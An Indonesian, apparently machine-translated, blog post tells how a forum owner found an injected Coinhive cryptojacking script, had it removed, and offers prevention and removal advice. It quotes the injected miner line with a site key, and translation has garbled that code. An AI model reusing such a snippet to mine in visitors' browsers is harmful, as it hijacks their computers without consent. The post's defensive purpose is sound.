Bagaimana menghapus script kripto-mining Coinhive dari situs web Anda

Saya biasanya mengunjungi forum setiap hari dan saya belum melihatnya sehari sebelumnya. Jadi saya berasumsi bahwa ini terjadi beberapa waktu pada malam hari, waktu saya, ketika saya sedang tidur.

Saya menggunakan perangkat lunak vBulletin untuk forum, dan itu diperbarui ke versi terbaru. Selain itu, ini cukup mengejutkan bagi kami, karena domain TheWindowsClub.com menggunakan Sucuri Web Antivirus & Firewall untuk melindungi dirinya dari ancaman & serangan web daring.

Perangkat lunak keamanan PC saya berhasil menghentikan skrip jahat untuk menjalankan di komputer Windows 10 saya. Saya memeriksa dengan browser lain seperti Chrome & Edge, dan hasilnya sama.

Setelah mengklik kanan halaman web forum dan memeriksa kode sumber, saya menemukan bahwa itu adalah script berbahaya CryptoMiner dari CoinHive.

Ini adalah Javascript Coinhive berbahaya yang telah masuk ke kode forum saya:

var penambang = baru CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Bagaimanapun, hal pertama yang saya lakukan adalah mengambil forum down dan informasikan Sucuri.

Orang-orang Sucuri membersihkan forum skrip Coinhive yang telah didorong ke forum saya dalam beberapa jam, dan semua baik-baik saja.

Apa yang CoinHive

Coinhive tawarkan penambang JavaScript untuk cryptocurrency Monero yang dapat Anda tanamkan di situs web Anda dan gunakan CPU komputer pengunjung situs web untuk menambang koin untuk Anda.

Ini disebut Cryptojacking . Ini melibatkan pembajakan browser pengguna untuk penambangan cryptocurrency. Beberapa pemilik situs web dapat menggunakannya sendiri untuk menghasilkan uang - tetapi dalam kasus kami, itu telah disuntik.

Ketika seorang pengguna mengakses situs yang terinfeksi, JavaScript Coinhive mengeksekusi dan menambang Monero menggunakan sumber daya CPU pengguna. Hal ini dapat menyebabkan CPU throttling & crash sistem tak terduga dari mesin korban.

Sekarang jika browser Anda terinfeksi Anda akan melihat penggunaan sumber daya Anda meningkat. Tutup browser, dan itu akan turun. Pengguna mungkin melihat mesinnya memanas, kipas berjalan cepat atau baterai cepat habis.

Saya meminta rekan saya Saurabh Mukhekar untuk mengunjungi forum saya menggunakan Mac dan melihat apa yang terjadi. Yah, komputer Mac-nya juga terpengaruh ketika dia membuka forum dengan Safari! Dia adalah salah satu pengguna Mac OSX yang cerdas yang menggunakan perangkat lunak antivirus untuk Mac-nya. Antivirus Avast-nya untuk Mac berhasil menghentikan skrip berbahaya itu untuk dijalankan.

Said Saurabh,

CoinHive malware tidak hanya membajak PC Windows tetapi juga Mac juga, karena itu adalah infeksi Javascript berbasis browser. Bagus saya tidak percaya pada mitos bahwa Mac tidak membutuhkan perangkat lunak antivirus, kalau tidak mesin saya akan terinfeksi dan Mac saya akan terus mengeluarkan koin untuk orang lain.

Cegah CoinHive dari menginfeksi situs web Anda

1. Jangan gunakan template atau plugin NULL apa pun di situs web / forum Anda.
2. Terus perbarui CMS Anda ke versi terbaru.
3. Perbarui perangkat lunak hosting Anda secara teratur (PHP, Database, dll …).
4. Amankan situs web Anda dengan penyedia keamanan web seperti Sucuri, Cloudflare, Wordfence, dll.
5. Ambil tindakan pencegahan dasar untuk mengamankan blog Anda.

Penghapusan penambang CoinHive dari situs web

Pertama-tama, Anda harus menjadi webmaster dari situs web yang terinfeksi - atau memiliki kredensial administratif yang memberi Anda akses ke semua file situs web.

Sekarang ketika antivirus Anda mendeteksi infeksi CoinHive, klik kanan pada halaman web dan pilih Lihat Kode Sumber. Selanjutnya tekan Ctrl + F dan cari "CoinHive".

Setelah Anda mengidentifikasi lokasi kode berbahaya, Anda perlu melihat posisinya - di mana lokasinya. Sekarang Anda harus menghapusnya secara manual. Untuk melakukan ini, Anda memerlukan sedikit pengetahuan tentang coding platform Anda. Anda harus mencari file yang terinfeksi dan secara manual menghapus skrip di atasnya. Jika Anda tidak yakin tentang hal itu, silakan minta beberapa ahli untuk melakukannya. Karena kami menggunakan Sucuri, kami membiarkan mereka melakukannya.

Setelah melakukan itu, bersihkan server & cache browser Anda. Jika Anda menggunakan plugin cache atau katakan MaxCDN, bersihkan cache itu juga.

Lindungi diri Anda dari skrip penambangan kripto

Cryptocurrency & teknologi Blockchain mengambil alih dunia. Ini menciptakan dampak pada ekonomi global dan menyebabkan gangguan teknologi juga. Semua orang mulai fokus pada pasar yang sangat menguntungkan - dan ini termasuk peretas situs web juga. Ketika tingkat pengembalian meningkat, kita harus berharap bahwa teknologi tersebut akan disalahgunakan. Itulah sisi gelap dari teknologi yang muncul.

Apa yang bisa kita lakukan adalah mengambil tindakan pencegahan sebaik mungkin setiap saat. Selain menggunakan perangkat lunak keamanan yang baik, gunakan ekstensi Chrome atau Firefox yang memblokir situs web dari menggunakan CPU Anda untuk menambang Cryptocurrency - atau lebih baik lagi, gunakan Anti-WebMiner yang akan menghentikan serangan Cryptojacking Mining Script dengan memodifikasi file Host Anda. Ini berfungsi di semua browser. Jika Anda adalah pengguna Mac, silakan dapatkan perangkat lunak antivirus untuk komputer Anda juga.

Sebagai masalah tindakan pencegahan yang melimpah, jika Anda pernah merasa bahwa Anda mungkin telah mengunjungi situs yang terinfeksi, itu akan menjadi ide yang baik untuk menghapus browser Anda cache dan pindai mesin Anda dengan perangkat lunak antivirus Anda serta AdwCleaner.

Tetap aman, tetap waspada!